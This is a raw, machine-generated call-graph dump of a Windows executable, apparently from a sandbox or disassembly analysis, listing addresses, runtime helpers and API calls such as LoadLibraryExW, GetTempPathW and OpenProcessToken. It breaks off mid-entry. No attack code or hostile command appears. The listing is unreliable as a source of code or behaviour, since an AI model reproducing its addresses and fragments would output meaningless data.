7ff6b9f1c5c0 _log10_special 8 API calls 16889 7ff6b9f307a1 16886->16889 16887->16877 16888->16894 16889->16840 16891 7ff6b9f27cbc 14 API calls 16890->16891 16892 7ff6b9f30717 16891->16892 16893 7ff6b9f27d94 37 API calls 16892->16893 16892->16894 16893->16894 16894->16886 16896 7ff6b9f307f6 16895->16896 16897 7ff6b9f307c6 16895->16897 16899 7ff6b9f307e1 16896->16899 16900 7ff6b9f30801 GetDriveTypeW 16896->16900 16898 7ff6b9f24f58 _fread_nolock 11 API calls 16897->16898 16901 7ff6b9f307cb 16898->16901 16903 7ff6b9f1c5c0 _log10_special 8 API calls 16899->16903 16900->16899 16902 7ff6b9f24f78 _get_daylight 11 API calls 16901->16902 16904 7ff6b9f307d6 16902->16904 16905 7ff6b9f3068b 16903->16905 16906 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 16904->16906 16905->16879 16905->16880 16906->16899 16921 7ff6b9f3a540 16907->16921 16909 7ff6b9f2f65e GetCurrentDirectoryW 16910 7ff6b9f2f69c 16909->16910 16913 7ff6b9f2f675 16909->16913 16911 7ff6b9f2ec08 _get_daylight 11 API calls 16910->16911 16914 7ff6b9f2f6ab 16911->16914 16912 7ff6b9f1c5c0 _log10_special 8 API calls 16915 7ff6b9f2f709 16912->16915 16913->16912 16916 7ff6b9f2f6c4 16914->16916 16917 7ff6b9f2f6b5 GetCurrentDirectoryW 16914->16917 16915->16879 16919 7ff6b9f24f78 _get_daylight 11 API calls 16916->16919 16917->16916 16918 7ff6b9f2f6c9 16917->16918 16920 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16918->16920 16919->16918 16920->16913 16922 7ff6b9f3a530 16921->16922 16922->16909 16922->16922 16924 7ff6b9f2f7a1 16923->16924 16925 7ff6b9f2f7c5 16923->16925 16924->16925 16926 7ff6b9f2f7a6 16924->16926 16927 7ff6b9f2f7ff 16925->16927 16930 7ff6b9f2f81e 16925->16930 16928 7ff6b9f24f78 _get_daylight 11 API calls 16926->16928 16929 7ff6b9f24f78 _get_daylight 11 API calls 16927->16929 16931 7ff6b9f2f7ab 16928->16931 16932 7ff6b9f2f804 16929->16932 16933 7ff6b9f24fbc 45 API calls 16930->16933 16934 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 16931->16934 16935 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 16932->16935 16938 7ff6b9f2f82b 16933->16938 16936 7ff6b9f2f7b6 16934->16936 16937 7ff6b9f2f80f 16935->16937 16936->16809 16937->16809 16938->16937 16939 7ff6b9f3054c 51 API calls 16938->16939 16939->16938 20523 7ff6b9f31720 20534 7ff6b9f37454 20523->20534 20536 7ff6b9f37461 20534->20536 20535 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20535->20536 20536->20535 20537 7ff6b9f3747d 20536->20537 20538 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20537->20538 20539 7ff6b9f31729 20537->20539 20538->20537 20540 7ff6b9f30348 EnterCriticalSection 20539->20540 16940 7ff6b9f1ccac 16961 7ff6b9f1ce7c 16940->16961 16943 7ff6b9f1cdf8 17115 7ff6b9f1d19c IsProcessorFeaturePresent 16943->17115 16944 7ff6b9f1ccc8 __scrt_acquire_startup_lock 16946 7ff6b9f1ce02 16944->16946 16953 7ff6b9f1cce6 __scrt_release_startup_lock 16944->16953 16947 7ff6b9f1d19c 7 API calls 16946->16947 16949 7ff6b9f1ce0d __CxxCallCatchBlock 16947->16949 16948 7ff6b9f1cd0b 16950 7ff6b9f1cd91 16967 7ff6b9f1d2e4 16950->16967 16952 7ff6b9f1cd96 16970 7ff6b9f11000 16952->16970 16953->16948 16953->16950 17104 7ff6b9f29b9c 16953->17104 16958 7ff6b9f1cdb9 16958->16949 17111 7ff6b9f1d000 16958->17111 16962 7ff6b9f1ce84 16961->16962 16963 7ff6b9f1ce90 __scrt_dllmain_crt_thread_attach 16962->16963 16964 7ff6b9f1ccc0 16963->16964 16965 7ff6b9f1ce9d 16963->16965 16964->16943 16964->16944 16965->16964 17122 7ff6b9f1d8f8 16965->17122 16968 7ff6b9f3a540 __scrt_get_show_window_mode 16967->16968 16969 7ff6b9f1d2fb GetStartupInfoW 16968->16969 16969->16952 16971 7ff6b9f11009 16970->16971 17149 7ff6b9f254f4 16971->17149 16973 7ff6b9f137fb 17156 7ff6b9f136b0 16973->17156 16978 7ff6b9f1c5c0 _log10_special 8 API calls 16981 7ff6b9f13ca7 16978->16981 16979 7ff6b9f1391b 17332 7ff6b9f145b0 16979->17332 16980 7ff6b9f1383c 17323 7ff6b9f11c80 16980->17323 17109 7ff6b9f1d328 GetModuleHandleW 16981->17109 16984 7ff6b9f1385b 17228 7ff6b9f18a20 16984->17228 16987 7ff6b9f1396a 17355 7ff6b9f12710 16987->17355 16989 7ff6b9f1388e 16998 7ff6b9f138bb __std_exception_copy 16989->16998 17327 7ff6b9f18b90 16989->17327 16991 7ff6b9f1395d 16992 7ff6b9f13962 16991->16992 16993 7ff6b9f13984 16991->16993 17351 7ff6b9f200bc 16992->17351 16994 7ff6b9f11c80 49 API calls 16993->16994 16997 7ff6b9f139a3 16994->16997 17003 7ff6b9f11950 115 API calls 16997->17003 17000 7ff6b9f18a20 14 API calls 16998->17000 17006 7ff6b9f138de __std_exception_copy 16998->17006 16999 7ff6b9f18b30 40 API calls 17001 7ff6b9f13a0b 16999->17001 17000->17006 17002 7ff6b9f18b90 40 API calls 17001->17002 17004 7ff6b9f13a17 17002->17004 17005 7ff6b9f139ce 17003->17005 17007 7ff6b9f18b90 40 API calls 17004->17007 17005->16984 17008 7ff6b9f139de 17005->17008 17006->16999 17012 7ff6b9f1390e __std_exception_copy 17006->17012 17009 7ff6b9f13a23 17007->17009 17010 7ff6b9f12710 54 API calls 17008->17010 17011 7ff6b9f18b90 40 API calls 17009->17011 17018 7ff6b9f13808 __std_exception_copy 17010->17018 17011->17012 17013 7ff6b9f18a20 14 API calls 17012->17013 17014 7ff6b9f13a3b 17013->17014 17015 7ff6b9f13a60 __std_exception_copy 17014->17015 17016 7ff6b9f13b2f 17014->17016 17030 7ff6b9f13aab 17015->17030 17241 7ff6b9f18b30 17015->17241 17017 7ff6b9f12710 54 API calls 17016->17017 17017->17018 17018->16978 17020 7ff6b9f18a20 14 API calls 17021 7ff6b9f13bf4 __std_exception_copy 17020->17021 17022 7ff6b9f13c46 17021->17022 17023 7ff6b9f13d41 17021->17023 17025 7ff6b9f13c50 17022->17025 17026 7ff6b9f13cd4 17022->17026 17366 7ff6b9f144d0 17023->17366 17248 7ff6b9f190e0 17025->17248 17028 7ff6b9f18a20 14 API calls 17026->17028 17032 7ff6b9f13ce0 17028->17032 17029 7ff6b9f13d4f 17033 7ff6b9f13d71 17029->17033 17034 7ff6b9f13d65 17029->17034 17030->17020 17035 7ff6b9f13c61 17032->17035 17038 7ff6b9f13ced 17032->17038 17037 7ff6b9f11c80 49 API calls 17033->17037 17369 7ff6b9f14620 17034->17369 17040 7ff6b9f12710 54 API calls 17035->17040 17046 7ff6b9f13cc8 __std_exception_copy 17037->17046 17041 7ff6b9f11c80 49 API calls 17038->17041 17040->17018 17044 7ff6b9f13d0b 17041->17044 17042 7ff6b9f13dc4 17298 7ff6b9f19400 17042->17298 17044->17046 17047 7ff6b9f13d12 17044->17047 17046->17042 17048 7ff6b9f13da7 SetDllDirectoryW LoadLibraryExW 17046->17048 17050 7ff6b9f12710 54 API calls 17047->17050 17048->17042 17049 7ff6b9f13dd7 SetDllDirectoryW 17052 7ff6b9f13e0a 17049->17052 17095 7ff6b9f13e5a 17049->17095 17050->17018 17053 7ff6b9f18a20 14 API calls 17052->17053 17061 7ff6b9f13e16 __std_exception_copy 17053->17061 17054 7ff6b9f13ffc 17056 7ff6b9f14006 PostMessageW GetMessageW 17054->17056 17057 7ff6b9f14029 17054->17057 17055 7ff6b9f13f1b 17303 7ff6b9f133c0 17055->17303 17056->17057 17446 7ff6b9f13360 17057->17446 17064 7ff6b9f13ef2 17061->17064 17068 7ff6b9f13e4e 17061->17068 17067 7ff6b9f18b30 40 API calls 17064->17067 17067->17095 17068->17095 17372 7ff6b9f16db0 17068->17372 17073 7ff6b9f16fb0 FreeLibrary 17081 7ff6b9f13e81 17084 7ff6b9f13ea2 17081->17084 17096 7ff6b9f13e85 17081->17096 17393 7ff6b9f16df0 17081->17393 17084->17096 17095->17054 17095->17055 17096->17095 17428 7ff6b9f12a50 17096->17428 17105 7ff6b9f29bd4 17104->17105 17106 7ff6b9f29bb3 17104->17106 19375 7ff6b9f2a448 17105->19375 17106->16950 17110 7ff6b9f1d339 17109->17110 17110->16958 17113 7ff6b9f1d011 17111->17113 17112 7ff6b9f1cdd0 17112->16948 17113->17112 17114 7ff6b9f1d8f8 7 API calls 17113->17114 17114->17112 17116 7ff6b9f1d1c2 _isindst __scrt_get_show_window_mode 17115->17116 17117 7ff6b9f1d1e1 RtlCaptureContext RtlLookupFunctionEntry 17116->17117 17118 7ff6b9f1d246 __scrt_get_show_window_mode 17117->17118 17119 7ff6b9f1d20a RtlVirtualUnwind 17117->17119 17120 7ff6b9f1d278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17118->17120 17119->17118 17121 7ff6b9f1d2c6 _isindst 17120->17121 17121->16946 17123 7ff6b9f1d90a 17122->17123 17124 7ff6b9f1d900 17122->17124 17123->16964 17128 7ff6b9f1dc94 17124->17128 17129 7ff6b9f1d905 17128->17129 17130 7ff6b9f1dca3 17128->17130 17132 7ff6b9f1dd00 17129->17132 17136 7ff6b9f1ded0 17130->17136 17133 7ff6b9f1dd2b 17132->17133 17134 7ff6b9f1dd2f 17133->17134 17135 7ff6b9f1dd0e DeleteCriticalSection 17133->17135 17134->17123 17135->17133 17140 7ff6b9f1dd38 17136->17140 17146 7ff6b9f1de22 TlsFree 17140->17146 17147 7ff6b9f1dd7c __vcrt_InitializeCriticalSectionEx 17140->17147 17141 7ff6b9f1ddaa LoadLibraryExW 17143 7ff6b9f1de49 17141->17143 17144 7ff6b9f1ddcb GetLastError 17141->17144 17142 7ff6b9f1de69 GetProcAddress 17142->17146 17143->17142 17145 7ff6b9f1de60 FreeLibrary 17143->17145 17144->17147 17145->17142 17147->17141 17147->17142 17147->17146 17148 7ff6b9f1dded LoadLibraryExW 17147->17148 17148->17143 17148->17147 17152 7ff6b9f2f4f0 17149->17152 17150 7ff6b9f2f543 17151 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17150->17151 17155 7ff6b9f2f56c 17151->17155 17152->17150 17153 7ff6b9f2f596 17152->17153 17459 7ff6b9f2f3c8 17153->17459 17155->16973 17467 7ff6b9f1c8c0 17156->17467 17159 7ff6b9f136eb GetLastError 17474 7ff6b9f12c50 17159->17474 17160 7ff6b9f13710 17469 7ff6b9f192f0 FindFirstFileExW 17160->17469 17164 7ff6b9f1377d 17500 7ff6b9f194b0 17164->17500 17165 7ff6b9f13723 17489 7ff6b9f19370 CreateFileW 17165->17489 17166 7ff6b9f1c5c0 _log10_special 8 API calls 17169 7ff6b9f137b5 17166->17169 17169->17018 17178 7ff6b9f11950 17169->17178 17171 7ff6b9f1378b 17172 7ff6b9f13706 17171->17172 17175 7ff6b9f12810 49 API calls 17171->17175 17172->17166 17173 7ff6b9f1374c __vcrt_InitializeCriticalSectionEx 17173->17164 17174 7ff6b9f13734 17492 7ff6b9f12810 17174->17492 17175->17172 17179 7ff6b9f145b0 108 API calls 17178->17179 17180 7ff6b9f11985 17179->17180 17181 7ff6b9f11c43 17180->17181 17182 7ff6b9f17f80 83 API calls 17180->17182 17183 7ff6b9f1c5c0 _log10_special 8 API calls 17181->17183 17184 7ff6b9f119cb 17182->17184 17185 7ff6b9f11c5e 17183->17185 17227 7ff6b9f11a03 17184->17227 17845 7ff6b9f20744 17184->17845 17185->16979 17185->16980 17187 7ff6b9f200bc 74 API calls 17187->17181 17188 7ff6b9f119e5 17189 7ff6b9f11a08 17188->17189 17190 7ff6b9f119e9 17188->17190 17849 7ff6b9f2040c 17189->17849 17192 7ff6b9f24f78 _get_daylight 11 API calls 17190->17192 17194 7ff6b9f119ee 17192->17194 17852 7ff6b9f12910 17194->17852 17195 7ff6b9f11a26 17198 7ff6b9f24f78 _get_daylight 11 API calls 17195->17198 17196 7ff6b9f11a45 17201 7ff6b9f11a7b 17196->17201 17202 7ff6b9f11a5c 17196->17202 17199 7ff6b9f11a2b 17198->17199 17200 7ff6b9f12910 54 API calls 17199->17200 17200->17227 17203 7ff6b9f11c80 49 API calls 17201->17203 17204 7ff6b9f24f78 _get_daylight 11 API calls 17202->17204 17205 7ff6b9f11a92 17203->17205 17206 7ff6b9f11a61 17204->17206 17207 7ff6b9f11c80 49 API calls 17205->17207 17208 7ff6b9f12910 54 API calls 17206->17208 17209 7ff6b9f11add 17207->17209 17208->17227 17210 7ff6b9f20744 73 API calls 17209->17210 17211 7ff6b9f11b01 17210->17211 17212 7ff6b9f11b16 17211->17212 17213 7ff6b9f11b35 17211->17213 17214 7ff6b9f24f78 _get_daylight 11 API calls 17212->17214 17215 7ff6b9f2040c _fread_nolock 53 API calls 17213->17215 17216 7ff6b9f11b1b 17214->17216 17217 7ff6b9f11b4a 17215->17217 17220 7ff6b9f12910 54 API calls 17216->17220 17218 7ff6b9f11b6f 17217->17218 17219 7ff6b9f11b50 17217->17219 17867 7ff6b9f20180 17218->17867 17221 7ff6b9f24f78 _get_daylight 11 API calls 17219->17221 17220->17227 17223 7ff6b9f11b55 17221->17223 17225 7ff6b9f12910 54 API calls 17223->17225 17225->17227 17226 7ff6b9f12710 54 API calls 17226->17227 17227->17187 17229 7ff6b9f18a2a 17228->17229 17230 7ff6b9f19400 2 API calls 17229->17230 17231 7ff6b9f18a49 GetEnvironmentVariableW 17230->17231 17232 7ff6b9f18a66 ExpandEnvironmentStringsW 17231->17232 17233 7ff6b9f18ab2 17231->17233 17232->17233 17235 7ff6b9f18a88 17232->17235 17234 7ff6b9f1c5c0 _log10_special 8 API calls 17233->17234 17236 7ff6b9f18ac4 17234->17236 17237 7ff6b9f194b0 2 API calls 17235->17237 17236->16989 17238 7ff6b9f18a9a 17237->17238 17239 7ff6b9f1c5c0 _log10_special 8 API calls 17238->17239 17240 7ff6b9f18aaa 17239->17240 17240->16989 17242 7ff6b9f19400 2 API calls 17241->17242 17243 7ff6b9f18b4c 17242->17243 17244 7ff6b9f19400 2 API calls 17243->17244 17245 7ff6b9f18b5c 17244->17245 18082 7ff6b9f282a8 17245->18082 17247 7ff6b9f18b6a __std_exception_copy 17247->17030 17249 7ff6b9f190f5 17248->17249 18100 7ff6b9f18760 GetCurrentProcess OpenProcessToken 17249->18100 17252 7ff6b9f18760 7 API calls 17253 7ff6b9f19121 17252->17253 17254 7ff6b9f1913a 17253->17254 17255 7ff6b9f19154 17253->17255 17256 7ff6b9f126b0 48 API calls 17254->17256 17257 7ff6b9f126b0 48 API calls 17255->17257 17258 7ff6b9f19152 17256->17258 17259 7ff6b9f19167 LocalFree LocalFree 17257->17259 17258->17259 17260 7ff6b9f19183 17259->17260 17263 7ff6b9f1918f 17259->17263 18110 7ff6b9f12b50 17260->18110 17262 7ff6b9f1c5c0 _log10_special 8 API calls 17264 7ff6b9f13c55 17262->17264 17263->17262 17264->17035 17265 7ff6b9f18850 17264->17265 17266 7ff6b9f18868 17265->17266 17267 7ff6b9f188ea GetTempPathW GetCurrentProcessId 17266->17267 17268 7ff6b9f1888c 17266->17268 18119 7ff6b9f125c0 17267->18119 17270 7ff6b9f18a20 14 API calls 17268->17270 17271 7ff6b9f18898 17270->17271 18126 7ff6b9f181c0 17271->18126 17276 7ff6b9f188d8 __std_exception_copy 17297 7ff6b9f189c4 __std_exception_copy 17276->17297 17278 7ff6b9f18918 __std_exception_copy 17284 7ff6b9f18955 __std_exception_copy 17278->17284 18123 7ff6b9f28bd8 17278->18123 17279 7ff6b9f282a8 38 API calls 17281 7ff6b9f188be __std_exception_copy 17279->17281 17281->17267 17285 7ff6b9f188cc 17281->17285 17283 7ff6b9f1c5c0 _log10_special 8 API calls 17287 7ff6b9f13cbb 17283->17287 17289 7ff6b9f19400 2 API calls 17284->17289 17284->17297 17287->17035 17287->17046 17290 7ff6b9f189a1 17289->17290 17291 7ff6b9f189a6 17290->17291 17292 7ff6b9f189d9 17290->17292 17294 7ff6b9f19400 2 API calls 17291->17294 17293 7ff6b9f282a8 38 API calls 17292->17293 17293->17297 17295 7ff6b9f189b6 17294->17295 17296 7ff6b9f282a8 38 API calls 17295->17296 17296->17297 17297->17283 17299 7ff6b9f19446 17298->17299 17300 7ff6b9f19422 MultiByteToWideChar 17298->17300 17301 7ff6b9f19463 MultiByteToWideChar 17299->17301 17302 7ff6b9f1945c __std_exception_copy 17299->17302 17300->17299 17300->17302 17301->17302 17302->17049 17315 7ff6b9f133ce __scrt_get_show_window_mode 17303->17315 17304 7ff6b9f1c5c0 _log10_special 8 API calls 17306 7ff6b9f13664 17304->17306 17305 7ff6b9f135c7 17305->17304 17306->17018 17322 7ff6b9f190c0 LocalFree 17306->17322 17308 7ff6b9f11c80 49 API calls 17308->17315 17309 7ff6b9f135e2 17311 7ff6b9f12710 54 API calls 17309->17311 17311->17305 17314 7ff6b9f135c9 17317 7ff6b9f12710 54 API calls 17314->17317 17315->17305 17315->17308 17315->17309 17315->17314 17316 7ff6b9f12a50 54 API calls 17315->17316 17320 7ff6b9f135d0 17315->17320 18297 7ff6b9f14550 17315->18297 18303 7ff6b9f17e10 17315->18303 18315 7ff6b9f11600 17315->18315 18363 7ff6b9f17110 17315->18363 18367 7ff6b9f14180 17315->18367 18411 7ff6b9f14440 17315->18411 17316->17315 17317->17305 17321 7ff6b9f12710 54 API calls 17320->17321 17321->17305 17324 7ff6b9f11ca5 17323->17324 17325 7ff6b9f249f4 49 API calls 17324->17325 17326 7ff6b9f11cc8 17325->17326 17326->16984 17328 7ff6b9f19400 2 API calls 17327->17328 17329 7ff6b9f18ba4 17328->17329 17330 7ff6b9f282a8 38 API calls 17329->17330 17331 7ff6b9f18bb6 __std_exception_copy 17330->17331 17331->16998 17333 7ff6b9f145bc 17332->17333 17334 7ff6b9f19400 2 API calls 17333->17334 17335 7ff6b9f145e4 17334->17335 17336 7ff6b9f19400 2 API calls 17335->17336 17337 7ff6b9f145f7 17336->17337 18578 7ff6b9f26004 17337->18578 17340 7ff6b9f1c5c0 _log10_special 8 API calls 17341 7ff6b9f1392b 17340->17341 17341->16987 17342 7ff6b9f17f80 17341->17342 17343 7ff6b9f17fa4 17342->17343 17344 7ff6b9f1807b __std_exception_copy 17343->17344 17345 7ff6b9f20744 73 API calls 17343->17345 17344->16991 17346 7ff6b9f17fc0 17345->17346 17346->17344 18969 7ff6b9f27938 17346->18969 17348 7ff6b9f17fd5 17348->17344 17349 7ff6b9f20744 73 API calls 17348->17349 17350 7ff6b9f2040c _fread_nolock 53 API calls 17348->17350 17349->17348 17350->17348 17352 7ff6b9f200ec 17351->17352 18984 7ff6b9f1fe98 17352->18984 17354 7ff6b9f20105 17354->16987 17356 7ff6b9f1c8c0 17355->17356 17357 7ff6b9f12734 GetCurrentProcessId 17356->17357 17358 7ff6b9f11c80 49 API calls 17357->17358 17359 7ff6b9f12787 17358->17359 17360 7ff6b9f249f4 49 API calls 17359->17360 17361 7ff6b9f127cf 17360->17361 17362 7ff6b9f12620 12 API calls 17361->17362 17363 7ff6b9f127f1 17362->17363 17364 7ff6b9f1c5c0 _log10_special 8 API calls 17363->17364 17365 7ff6b9f12801 17364->17365 17365->17018 17367 7ff6b9f11c80 49 API calls 17366->17367 17368 7ff6b9f144ed 17367->17368 17368->17029 17370 7ff6b9f11c80 49 API calls 17369->17370 17371 7ff6b9f14650 17370->17371 17371->17046 17373 7ff6b9f16dc5 17372->17373 17374 7ff6b9f24f78 _get_daylight 11 API calls 17373->17374 17377 7ff6b9f13e6c 17373->17377 17375 7ff6b9f16dd2 17374->17375 17376 7ff6b9f12910 54 API calls 17375->17376 17376->17377 17378 7ff6b9f17330 17377->17378 18995 7ff6b9f11470 17378->18995 17380 7ff6b9f17358 17381 7ff6b9f14620 49 API calls 17380->17381 17385 7ff6b9f174a9 __std_exception_copy 17380->17385 17382 7ff6b9f1737a 17381->17382 17383 7ff6b9f14620 49 API calls 17382->17383 17387 7ff6b9f1737f 17382->17387 17385->17081 19101 7ff6b9f16350 17446->19101 17449 7ff6b9f13399 17455 7ff6b9f13670 17449->17455 17456 7ff6b9f1367e 17455->17456 17457 7ff6b9f1368f 17456->17457 19374 7ff6b9f19050 FreeLibrary 17456->19374 17457->17073 17466 7ff6b9f254dc EnterCriticalSection 17459->17466 17468 7ff6b9f136bc GetModuleFileNameW 17467->17468 17468->17159 17468->17160 17470 7ff6b9f1932f FindClose 17469->17470 17471 7ff6b9f19342 17469->17471 17470->17471 17472 7ff6b9f1c5c0 _log10_special 8 API calls 17471->17472 17473 7ff6b9f1371a 17472->17473 17473->17164 17473->17165 17475 7ff6b9f1c8c0 17474->17475 17476 7ff6b9f12c70 GetCurrentProcessId 17475->17476 17505 7ff6b9f126b0 17476->17505 17478 7ff6b9f12cb9 17509 7ff6b9f24c48 17478->17509 17481 7ff6b9f126b0 48 API calls 17482 7ff6b9f12d34 FormatMessageW 17481->17482 17484 7ff6b9f12d6d 17482->17484 17485 7ff6b9f12d7f MessageBoxW 17482->17485 17486 7ff6b9f126b0 48 API calls 17484->17486 17487 7ff6b9f1c5c0 _log10_special 8 API calls 17485->17487 17486->17485 17488 7ff6b9f12daf 17487->17488 17488->17172 17490 7ff6b9f13730 17489->17490 17491 7ff6b9f193b0 GetFinalPathNameByHandleW CloseHandle 17489->17491 17490->17173 17490->17174 17491->17490 17493 7ff6b9f12834 17492->17493 17494 7ff6b9f126b0 48 API calls 17493->17494 17495 7ff6b9f12887 17494->17495 17496 7ff6b9f24c48 48 API calls 17495->17496 17497 7ff6b9f128d0 MessageBoxW 17496->17497 17498 7ff6b9f1c5c0 _log10_special 8 API calls 17497->17498 17499 7ff6b9f12900 17498->17499 17499->17172 17501 7ff6b9f194da WideCharToMultiByte 17500->17501 17504 7ff6b9f19505 17500->17504 17502 7ff6b9f1951b __std_exception_copy 17501->17502 17501->17504 17502->17171 17503 7ff6b9f19522 WideCharToMultiByte 17503->17502 17504->17502 17504->17503 17506 7ff6b9f126d5 17505->17506 17507 7ff6b9f24c48 48 API calls 17506->17507 17508 7ff6b9f126f8 17507->17508 17508->17478 17512 7ff6b9f24ca2 17509->17512 17510 7ff6b9f24cc7 17511 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17510->17511 17515 7ff6b9f24cf1 17511->17515 17512->17510 17513 7ff6b9f24d03 17512->17513 17527 7ff6b9f23000 17513->17527 17517 7ff6b9f1c5c0 _log10_special 8 API calls 17515->17517 17516 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17516->17515 17518 7ff6b9f12d04 17517->17518 17518->17481 17520 7ff6b9f24e0a 17523 7ff6b9f24e14 17520->17523 17525 7ff6b9f24de4 17520->17525 17521 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17521->17515 17522 7ff6b9f24db0 17524 7ff6b9f24db9 17522->17524 17522->17525 17526 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17523->17526 17524->17521 17525->17516 17526->17515 17528 7ff6b9f2303e 17527->17528 17529 7ff6b9f2302e 17527->17529 17530 7ff6b9f23047 17528->17530 17534 7ff6b9f23075 17528->17534 17531 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17529->17531 17532 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17530->17532 17533 7ff6b9f2306d 17531->17533 17532->17533 17533->17520 17533->17522 17533->17524 17533->17525 17534->17529 17534->17533 17538 7ff6b9f23a14 17534->17538 17571 7ff6b9f23460 17534->17571 17608 7ff6b9f22bf0 17534->17608 17539 7ff6b9f23ac7 17538->17539 17540 7ff6b9f23a56 17538->17540 17543 7ff6b9f23acc 17539->17543 17547 7ff6b9f23b20 17539->17547 17541 7ff6b9f23a5c 17540->17541 17542 7ff6b9f23af1 17540->17542 17544 7ff6b9f23a61 17541->17544 17545 7ff6b9f23a90 17541->17545 17631 7ff6b9f21dc4 17542->17631 17546 7ff6b9f23b01 17543->17546 17553 7ff6b9f23ace 17543->17553 17548 7ff6b9f23b37 17544->17548 17551 7ff6b9f23a67 17544->17551 17545->17551 17554 7ff6b9f23b2f 17545->17554 17638 7ff6b9f219b4 17546->17638 17547->17548 17549 7ff6b9f23b2a 17547->17549 17547->17554 17645 7ff6b9f2471c 17548->17645 17549->17542 17549->17554 17552 7ff6b9f23a70 17551->17552 17559 7ff6b9f23aa2 17551->17559 17567 7ff6b9f23a8b 17551->17567 17569 7ff6b9f23b60 17552->17569 17611 7ff6b9f241c8 17552->17611 17553->17552 17558 7ff6b9f23add 17553->17558 17554->17569 17649 7ff6b9f221d4 17554->17649 17558->17542 17561 7ff6b9f23ae2 17558->17561 17559->17569 17621 7ff6b9f24504 17559->17621 17561->17569 17627 7ff6b9f245c8 17561->17627 17563 7ff6b9f1c5c0 _log10_special 8 API calls 17565 7ff6b9f23e5a 17563->17565 17565->17534 17567->17569 17570 7ff6b9f23d4c 17567->17570 17656 7ff6b9f24830 17567->17656 17569->17563 17570->17569 17662 7ff6b9f2ea78 17570->17662 17572 7ff6b9f2346e 17571->17572 17573 7ff6b9f23484 17571->17573 17574 7ff6b9f23ac7 17572->17574 17575 7ff6b9f23a56 17572->17575 17577 7ff6b9f234c4 17572->17577 17576 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17573->17576 17573->17577 17580 7ff6b9f23acc 17574->17580 17581 7ff6b9f23b20 17574->17581 17578 7ff6b9f23a5c 17575->17578 17579 7ff6b9f23af1 17575->17579 17576->17577 17577->17534 17582 7ff6b9f23a61 17578->17582 17583 7ff6b9f23a90 17578->17583 17588 7ff6b9f21dc4 38 API calls 17579->17588 17584 7ff6b9f23ace 17580->17584 17585 7ff6b9f23b01 17580->17585 17586 7ff6b9f23b37 17581->17586 17587 7ff6b9f23b2a 17581->17587 17593 7ff6b9f23b2f 17581->17593 17582->17586 17589 7ff6b9f23a67 17582->17589 17583->17589 17583->17593 17590 7ff6b9f23a70 17584->17590 17595 7ff6b9f23add 17584->17595 17591 7ff6b9f219b4 38 API calls 17585->17591 17594 7ff6b9f2471c 45 API calls 17586->17594 17587->17579 17587->17593 17604 7ff6b9f23a8b 17588->17604 17589->17590 17596 7ff6b9f23aa2 17589->17596 17589->17604 17592 7ff6b9f241c8 47 API calls 17590->17592 17606 7ff6b9f23b60 17590->17606 17591->17604 17592->17604 17597 7ff6b9f221d4 38 API calls 17593->17597 17593->17606 17594->17604 17595->17579 17598 7ff6b9f23ae2 17595->17598 17599 7ff6b9f24504 46 API calls 17596->17599 17596->17606 17597->17604 17601 7ff6b9f245c8 37 API calls 17598->17601 17598->17606 17599->17604 17600 7ff6b9f1c5c0 _log10_special 8 API calls 17602 7ff6b9f23e5a 17600->17602 17601->17604 17602->17534 17603 7ff6b9f24830 45 API calls 17607 7ff6b9f23d4c 17603->17607 17604->17603 17604->17606 17604->17607 17605 7ff6b9f2ea78 46 API calls 17605->17607 17606->17600 17607->17605 17607->17606 17828 7ff6b9f21038 17608->17828 17612 7ff6b9f241ee 17611->17612 17674 7ff6b9f20bf0 17612->17674 17617 7ff6b9f24830 45 API calls 17620 7ff6b9f24333 17617->17620 17618 7ff6b9f24830 45 API calls 17619 7ff6b9f243c1 17618->17619 17619->17567 17620->17618 17620->17619 17620->17620 17623 7ff6b9f24539 17621->17623 17622 7ff6b9f24557 17625 7ff6b9f2ea78 46 API calls 17622->17625 17623->17622 17624 7ff6b9f24830 45 API calls 17623->17624 17626 7ff6b9f2457e 17623->17626 17624->17622 17625->17626 17626->17567 17629 7ff6b9f245e9 17627->17629 17628 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17630 7ff6b9f2461a 17628->17630 17629->17628 17629->17630 17630->17567 17633 7ff6b9f21df7 17631->17633 17632 7ff6b9f21e26 17637 7ff6b9f21e63 17632->17637 17801 7ff6b9f20c98 17632->17801 17633->17632 17635 7ff6b9f21ee3 17633->17635 17636 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17635->17636 17636->17637 17637->17567 17640 7ff6b9f219e7 17638->17640 17639 7ff6b9f21a16 17641 7ff6b9f20c98 12 API calls 17639->17641 17644 7ff6b9f21a53 17639->17644 17640->17639 17642 7ff6b9f21ad3 17640->17642 17641->17644 17643 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17642->17643 17643->17644 17644->17567 17646 7ff6b9f2475f 17645->17646 17648 7ff6b9f24763 __crtLCMapStringW 17646->17648 17809 7ff6b9f247b8 17646->17809 17648->17567 17650 7ff6b9f22207 17649->17650 17651 7ff6b9f22236 17650->17651 17653 7ff6b9f222f3 17650->17653 17652 7ff6b9f20c98 12 API calls 17651->17652 17655 7ff6b9f22273 17651->17655 17652->17655 17654 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17653->17654 17654->17655 17655->17567 17657 7ff6b9f24847 17656->17657 17813 7ff6b9f2da28 17657->17813 17664 7ff6b9f2eaa9 17662->17664 17672 7ff6b9f2eab7 17662->17672 17663 7ff6b9f2ead7 17666 7ff6b9f2eae8 17663->17666 17667 7ff6b9f2eb0f 17663->17667 17664->17663 17665 7ff6b9f24830 45 API calls 17664->17665 17664->17672 17665->17663 17821 7ff6b9f30110 17666->17821 17669 7ff6b9f2eb39 17667->17669 17670 